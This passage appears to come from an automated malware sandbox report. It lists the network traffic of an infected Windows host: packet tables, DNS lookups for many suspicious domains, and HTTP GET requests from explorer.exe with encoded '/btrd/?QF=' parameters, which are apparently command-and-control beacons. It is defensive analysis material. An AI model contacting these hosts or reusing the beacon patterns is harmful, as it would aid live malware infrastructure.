                                                                              Jun 25, 2024 15:16:56.264938116 CEST80491803.33.130.190192.168.2.22
                                                                              Jun 25, 2024 15:17:16.454638958 CEST4918180192.168.2.225.149.161.103
                                                                              Jun 25, 2024 15:17:16.459590912 CEST80491815.149.161.103192.168.2.22
                                                                              Jun 25, 2024 15:17:16.459708929 CEST4918180192.168.2.225.149.161.103
                                                                              Jun 25, 2024 15:17:16.459708929 CEST4918180192.168.2.225.149.161.103
                                                                              Jun 25, 2024 15:17:16.464612961 CEST80491815.149.161.103192.168.2.22
                                                                              Jun 25, 2024 15:17:17.329193115 CEST80491815.149.161.103192.168.2.22
                                                                              Jun 25, 2024 15:17:17.329324007 CEST4918180192.168.2.225.149.161.103
                                                                              Jun 25, 2024 15:17:17.329350948 CEST80491815.149.161.103192.168.2.22
                                                                              Jun 25, 2024 15:17:17.329392910 CEST4918180192.168.2.225.149.161.103
                                                                              Jun 25, 2024 15:17:17.334808111 CEST80491815.149.161.103192.168.2.22
                                                                              Jun 25, 2024 15:17:35.359344959 CEST4918280192.168.2.22156.241.141.214
                                                                              Jun 25, 2024 15:17:35.364670038 CEST8049182156.241.141.214192.168.2.22
                                                                              Jun 25, 2024 15:17:35.364789009 CEST4918280192.168.2.22156.241.141.214
                                                                              Jun 25, 2024 15:17:35.364789009 CEST4918280192.168.2.22156.241.141.214
                                                                              Jun 25, 2024 15:17:35.369738102 CEST8049182156.241.141.214192.168.2.22
                                                                              Jun 25, 2024 15:17:36.265752077 CEST8049182156.241.141.214192.168.2.22
                                                                              Jun 25, 2024 15:17:36.265851021 CEST4918280192.168.2.22156.241.141.214
                                                                              Jun 25, 2024 15:17:36.267302990 CEST4918280192.168.2.22156.241.141.214
                                                                              Jun 25, 2024 15:17:36.276544094 CEST8049182156.241.141.214192.168.2.22
                                                                              Jun 25, 2024 15:17:56.706660032 CEST4918380192.168.2.22192.243.61.227
                                                                              Jun 25, 2024 15:17:56.711558104 CEST8049183192.243.61.227192.168.2.22
                                                                              Jun 25, 2024 15:17:56.714740038 CEST4918380192.168.2.22192.243.61.227
                                                                              Jun 25, 2024 15:17:56.714740038 CEST4918380192.168.2.22192.243.61.227
                                                                              Jun 25, 2024 15:17:56.719619036 CEST8049183192.243.61.227192.168.2.22
                                                                              Jun 25, 2024 15:17:57.177083969 CEST8049183192.243.61.227192.168.2.22
                                                                              Jun 25, 2024 15:17:57.177377939 CEST8049183192.243.61.227192.168.2.22
                                                                              Jun 25, 2024 15:17:57.177500963 CEST4918380192.168.2.22192.243.61.227
                                                                              Jun 25, 2024 15:17:57.197818995 CEST4918380192.168.2.22192.243.61.227
                                                                              Jun 25, 2024 15:17:57.202708006 CEST8049183192.243.61.227192.168.2.22

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jun 25, 2024 15:13:41.822052956 CEST5291753192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:13:41.834736109 CEST53529178.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:13:43.469650030 CEST137137192.168.2.22192.168.2.255
                                                                              Jun 25, 2024 15:13:44.233690977 CEST137137192.168.2.22192.168.2.255
                                                                              Jun 25, 2024 15:13:44.998066902 CEST137137192.168.2.22192.168.2.255
                                                                              Jun 25, 2024 15:13:45.768246889 CEST5482153192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:13:45.779640913 CEST53548218.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:13:45.781665087 CEST5471953192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:13:45.789361954 CEST53547198.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:13:49.693814039 CEST4988153192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:13:49.706058025 CEST53498818.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:13:49.707600117 CEST5499853192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:13:49.720551014 CEST53549988.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:13:50.904556036 CEST5278153192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:13:50.917550087 CEST53527818.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:13:50.919220924 CEST6392653192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:13:50.926356077 CEST53639268.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:13:52.440567970 CEST6551053192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:13:52.447381020 CEST53655108.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:13:52.449054003 CEST6267253192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:13:52.702608109 CEST53626728.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:13:55.916984081 CEST5647553192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:13:55.924243927 CEST53564758.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:14:00.202127934 CEST4938453192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:14:00.215677977 CEST53493848.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:14:00.218179941 CEST5484253192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:14:00.235625982 CEST53548428.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:14:02.364087105 CEST5810553192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:14:02.370990992 CEST53581058.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:14:02.660696030 CEST6492853192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:14:02.667893887 CEST53649288.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:14:32.510732889 CEST5739053192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:14:32.523706913 CEST53573908.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:14:54.208805084 CEST5809553192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:14:54.221290112 CEST53580958.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:15:29.270454884 CEST138138192.168.2.22192.168.2.255
                                                                              Jun 25, 2024 15:15:33.320872068 CEST5426153192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:15:34.221479893 CEST53542618.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:15:34.222495079 CEST5426153192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:15:34.375030994 CEST53542618.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:15:55.134747028 CEST6050753192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:15:55.165908098 CEST53605078.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:16:15.015436888 CEST5044653192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:16:15.031598091 CEST53504468.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:16:15.032315016 CEST137137192.168.2.22192.168.2.255
                                                                              Jun 25, 2024 15:16:15.787904978 CEST137137192.168.2.22192.168.2.255
                                                                              Jun 25, 2024 15:16:16.552227974 CEST137137192.168.2.22192.168.2.255
                                                                              Jun 25, 2024 15:16:35.449687958 CEST5593953192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:16:35.475580931 CEST53559398.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:16:35.479166031 CEST137137192.168.2.22192.168.2.255
                                                                              Jun 25, 2024 15:16:36.239680052 CEST137137192.168.2.22192.168.2.255
                                                                              Jun 25, 2024 15:16:37.004209995 CEST137137192.168.2.22192.168.2.255
                                                                              Jun 25, 2024 15:16:55.761102915 CEST4960853192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:16:55.772923946 CEST53496088.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:17:16.402645111 CEST6148653192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:17:16.452686071 CEST53614868.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:17:35.026262045 CEST6245353192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:17:35.358678102 CEST53624538.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:17:56.382740974 CEST5056853192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:17:56.692616940 CEST53505688.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:17:56.694922924 CEST5056853192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:17:56.701594114 CEST53505688.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:18:15.522667885 CEST6146753192.168.2.228.8.8.8
                                                                              Jun 25, 2024 15:18:15.687892914 CEST53614678.8.8.8192.168.2.22
                                                                              Jun 25, 2024 15:18:25.409166098 CEST138138192.168.2.22192.168.2.255

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jun 25, 2024 15:13:41.822052956 CEST192.168.2.228.8.8.80x14c8Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:45.768246889 CEST192.168.2.228.8.8.80x6c8bStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:45.781665087 CEST192.168.2.228.8.8.80xb239Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:49.693814039 CEST192.168.2.228.8.8.80x1100Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:49.707600117 CEST192.168.2.228.8.8.80x2664Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:50.904556036 CEST192.168.2.228.8.8.80xd97eStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:50.919220924 CEST192.168.2.228.8.8.80x9c5bStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:52.440567970 CEST192.168.2.228.8.8.80x4189Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:52.449054003 CEST192.168.2.228.8.8.80x2383Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:55.916984081 CEST192.168.2.228.8.8.80x56a7Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:00.202127934 CEST192.168.2.228.8.8.80x99e0Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:00.218179941 CEST192.168.2.228.8.8.80x98abStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:02.364087105 CEST192.168.2.228.8.8.80xae0fStandard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:02.660696030 CEST192.168.2.228.8.8.80x61d4Standard query (0)universalmovies.topA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:32.510732889 CEST192.168.2.228.8.8.80x622aStandard query (0)www.onlynaturlpt.shopA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:54.208805084 CEST192.168.2.228.8.8.80xa59fStandard query (0)www.wirewizardselectric.netA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:15:33.320872068 CEST192.168.2.228.8.8.80xebecStandard query (0)www.cnoszirzbkaqz.comA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:15:34.222495079 CEST192.168.2.228.8.8.80xebecStandard query (0)www.cnoszirzbkaqz.comA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:15:55.134747028 CEST192.168.2.228.8.8.80x15a2Standard query (0)www.naddafornadda.comA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:16:15.015436888 CEST192.168.2.228.8.8.80xc2c0Standard query (0)www.turbrun.comA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:16:35.449687958 CEST192.168.2.228.8.8.80xb8eStandard query (0)www.wzxq.xyzA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:16:55.761102915 CEST192.168.2.228.8.8.80xe8fbStandard query (0)www.texanboxes.comA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:16.402645111 CEST192.168.2.228.8.8.80xbbcbStandard query (0)www.outletivo.comA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:35.026262045 CEST192.168.2.228.8.8.80xf219Standard query (0)www.380747.netA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.382740974 CEST192.168.2.228.8.8.80xcf3aStandard query (0)www.emeraldsurrogatefabric.comA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.694922924 CEST192.168.2.228.8.8.80xcf3aStandard query (0)www.emeraldsurrogatefabric.comA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:18:15.522667885 CEST192.168.2.228.8.8.80x38c8Standard query (0)www.furryfriendsupply.storeA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jun 25, 2024 15:13:41.834736109 CEST8.8.8.8192.168.2.220x14c8No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:41.834736109 CEST8.8.8.8192.168.2.220x14c8No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:45.779640913 CEST8.8.8.8192.168.2.220x6c8bNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:45.779640913 CEST8.8.8.8192.168.2.220x6c8bNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:45.789361954 CEST8.8.8.8192.168.2.220xb239No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:45.789361954 CEST8.8.8.8192.168.2.220xb239No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:49.706058025 CEST8.8.8.8192.168.2.220x1100No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:49.706058025 CEST8.8.8.8192.168.2.220x1100No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:49.720551014 CEST8.8.8.8192.168.2.220x2664No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:49.720551014 CEST8.8.8.8192.168.2.220x2664No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:50.917550087 CEST8.8.8.8192.168.2.220xd97eNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:50.917550087 CEST8.8.8.8192.168.2.220xd97eNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:50.926356077 CEST8.8.8.8192.168.2.220x9c5bNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:50.926356077 CEST8.8.8.8192.168.2.220x9c5bNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:52.447381020 CEST8.8.8.8192.168.2.220x4189No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:52.447381020 CEST8.8.8.8192.168.2.220x4189No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:52.702608109 CEST8.8.8.8192.168.2.220x2383No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:52.702608109 CEST8.8.8.8192.168.2.220x2383No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:55.924243927 CEST8.8.8.8192.168.2.220x56a7No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:13:55.924243927 CEST8.8.8.8192.168.2.220x56a7No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:00.215677977 CEST8.8.8.8192.168.2.220x99e0No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:00.215677977 CEST8.8.8.8192.168.2.220x99e0No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:00.235625982 CEST8.8.8.8192.168.2.220x98abNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:00.235625982 CEST8.8.8.8192.168.2.220x98abNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:02.370990992 CEST8.8.8.8192.168.2.220xae0fNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:02.370990992 CEST8.8.8.8192.168.2.220xae0fNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:02.667893887 CEST8.8.8.8192.168.2.220x61d4No error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:02.667893887 CEST8.8.8.8192.168.2.220x61d4No error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:32.523706913 CEST8.8.8.8192.168.2.220x622aNo error (0)www.onlynaturlpt.shop104.21.89.47A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:32.523706913 CEST8.8.8.8192.168.2.220x622aNo error (0)www.onlynaturlpt.shop172.67.156.108A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:54.221290112 CEST8.8.8.8192.168.2.220xa59fNo error (0)www.wirewizardselectric.netwirewizardselectric.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:54.221290112 CEST8.8.8.8192.168.2.220xa59fNo error (0)wirewizardselectric.net15.197.148.33A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:14:54.221290112 CEST8.8.8.8192.168.2.220xa59fNo error (0)wirewizardselectric.net3.33.130.190A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:15:34.221479893 CEST8.8.8.8192.168.2.220xebecNo error (0)www.cnoszirzbkaqz.comcnoszirzbkaqz.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jun 25, 2024 15:15:34.221479893 CEST8.8.8.8192.168.2.220xebecNo error (0)cnoszirzbkaqz.com167.172.228.26A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:15:34.375030994 CEST8.8.8.8192.168.2.220xebecNo error (0)www.cnoszirzbkaqz.comcnoszirzbkaqz.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jun 25, 2024 15:15:34.375030994 CEST8.8.8.8192.168.2.220xebecNo error (0)cnoszirzbkaqz.com167.172.228.26A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:15:55.165908098 CEST8.8.8.8192.168.2.220x15a2No error (0)www.naddafornadda.comnaddafornadda.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jun 25, 2024 15:15:55.165908098 CEST8.8.8.8192.168.2.220x15a2No error (0)naddafornadda.com15.197.148.33A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:15:55.165908098 CEST8.8.8.8192.168.2.220x15a2No error (0)naddafornadda.com3.33.130.190A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:16:15.031598091 CEST8.8.8.8192.168.2.220xc2c0Name error (3)www.turbrun.comnonenoneA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:16:35.475580931 CEST8.8.8.8192.168.2.220xb8eName error (3)www.wzxq.xyznonenoneA (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:16:55.772923946 CEST8.8.8.8192.168.2.220xe8fbNo error (0)www.texanboxes.comtexanboxes.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jun 25, 2024 15:16:55.772923946 CEST8.8.8.8192.168.2.220xe8fbNo error (0)texanboxes.com3.33.130.190A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:16:55.772923946 CEST8.8.8.8192.168.2.220xe8fbNo error (0)texanboxes.com15.197.148.33A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:16.452686071 CEST8.8.8.8192.168.2.220xbbcbNo error (0)www.outletivo.com5.149.161.103A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:35.358678102 CEST8.8.8.8192.168.2.220xf219No error (0)www.380747.net156.241.141.214A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.692616940 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com192.243.61.225A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.692616940 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com172.240.127.234A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.692616940 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com172.240.108.84A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.692616940 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com172.240.108.68A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.692616940 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com172.240.108.76A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.692616940 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com192.243.61.227A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.692616940 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com172.240.253.132A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.692616940 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com192.243.59.13A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.692616940 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com192.243.59.12A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.692616940 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com192.243.59.20A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.701594114 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com192.243.61.227A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.701594114 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com172.240.108.84A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.701594114 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com172.240.108.68A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.701594114 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com172.240.108.76A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.701594114 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com172.240.127.234A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.701594114 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com192.243.59.20A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.701594114 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com192.243.61.225A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.701594114 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com192.243.59.12A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.701594114 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com172.240.253.132A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:17:56.701594114 CEST8.8.8.8192.168.2.220xcf3aNo error (0)www.emeraldsurrogatefabric.com192.243.59.13A (IP address)IN (0x0001)false
                                                                              Jun 25, 2024 15:18:15.687892914 CEST8.8.8.8192.168.2.220x38c8No error (0)www.furryfriendsupply.storefurryfriendsupply.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jun 25, 2024 15:18:15.687892914 CEST8.8.8.8192.168.2.220x38c8No error (0)furryfriendsupply.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jun 25, 2024 15:18:15.687892914 CEST8.8.8.8192.168.2.220x38c8No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • universalmovies.top
                                                                              • www.onlynaturlpt.shop
                                                                              • www.wirewizardselectric.net
                                                                              • www.cnoszirzbkaqz.com
                                                                              • www.naddafornadda.com
                                                                              • www.texanboxes.com
                                                                              • www.outletivo.com
                                                                              • www.380747.net
                                                                              • www.emeraldsurrogatefabric.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.2249176104.21.89.47801244C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jun 25, 2024 15:14:32.532372952 CEST173OUTGET /btrd/?QF=ei06BbrL1XNnLWKSHbPo044PuME3Vv+0MArEui1DSIZtlWDrcB5dDFtUvldPnIarUtM2xw==&rr=F82tHBM8VV6X-vo HTTP/1.1
                                                                              Host: www.onlynaturlpt.shop
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jun 25, 2024 15:14:34.047765017 CEST919INHTTP/1.1 301 Moved Permanently
                                                                              Date: Tue, 25 Jun 2024 13:14:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              X-Redirect-By: WordPress
                                                                              Location: http://onlynaturlpt.shop/btrd/?QF=ei06BbrL1XNnLWKSHbPo044PuME3Vv+0MArEui1DSIZtlWDrcB5dDFtUvldPnIarUtM2xw==&rr=F82tHBM8VV6X-vo
                                                                              Vary: Accept-Encoding
                                                                              X-Served-By: www.onlynaturlpt.shop
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyBn5sLy5QZk%2FTO5ft04md77HdiOW5bL3UkKUUtegLe2Zf8GOMLSvLi%2BmK3PK1bxxfjBIy4frlXYn7dwIXGmCX%2BXXw9zciipDK3bXvJjfplQFIp4Gx4Unzv%2FCwmEo8pQydZB7WiB1V8%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 899538a3fb2e4270-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.224917715.197.148.33801244C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jun 25, 2024 15:14:54.227211952 CEST179OUTGET /btrd/?QF=4g1xeR4m3EPNXFQvrJzB56K+BPAX9uki7kS+nMlSCcqOR13OJ5fSn6jCC3gh4c3HUzbxQw==&rr=F82tHBM8VV6X-vo HTTP/1.1
                                                                              Host: www.wirewizardselectric.net
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jun 25, 2024 15:14:54.688900948 CEST349INHTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Tue, 25 Jun 2024 13:14:54 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 209
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 46 3d 34 67 31 78 65 52 34 6d 33 45 50 4e 58 46 51 76 72 4a 7a 42 35 36 4b 2b 42 50 41 58 39 75 6b 69 37 6b 53 2b 6e 4d 6c 53 43 63 71 4f 52 31 33 4f 4a 35 66 53 6e 36 6a 43 43 33 67 68 34 63 33 48 55 7a 62 78 51 77 3d 3d 26 72 72 3d 46 38 32 74 48 42 4d 38 56 56 36 58 2d 76 6f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QF=4g1xeR4m3EPNXFQvrJzB56K+BPAX9uki7kS+nMlSCcqOR13OJ5fSn6jCC3gh4c3HUzbxQw==&rr=F82tHBM8VV6X-vo"}</script></head></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.2249178167.172.228.26801244C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
